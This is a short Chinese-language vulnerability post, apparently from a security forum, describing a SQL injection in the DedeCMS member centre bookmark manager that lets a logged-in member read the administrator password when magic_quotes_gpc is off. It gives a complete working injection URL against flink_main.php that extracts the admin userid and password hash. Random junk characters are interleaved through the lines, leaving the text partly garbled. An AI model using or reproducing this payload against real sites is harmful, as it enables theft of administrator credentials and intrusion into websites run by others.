DedeCMS会员中心SQL注射漏洞 {+ P8 I5 ?4 [9 C9 T- P$ i! D5 }
需要magic_quotes_gpc = Off
* G! T" `. N* d; f+ w& }6 t; Y9 D会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
! W5 x+ R6 n. G* A9 F- y# t - i& M; K# F! H! m q) m/ t$ E3 ]; h+ q
DedeCMS会员中心书签管理SQL注射漏洞9 O/ v. t8 D& ^2 x$ C8 X
成功利用该漏洞可获得管理员密码
6 Z; H- {/ o5 Y+ E
( y5 q: A+ @2 j |& P& \2 |会员登录后可以执行SQL语句查询数据库任意内容如管理员密码1 C1 _, L5 [5 L) O5 N
* m+ w/ n& a: l0 ~$ T3 E9 }( b
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r3 Q: J$ i8 h" I" B; v6 R
|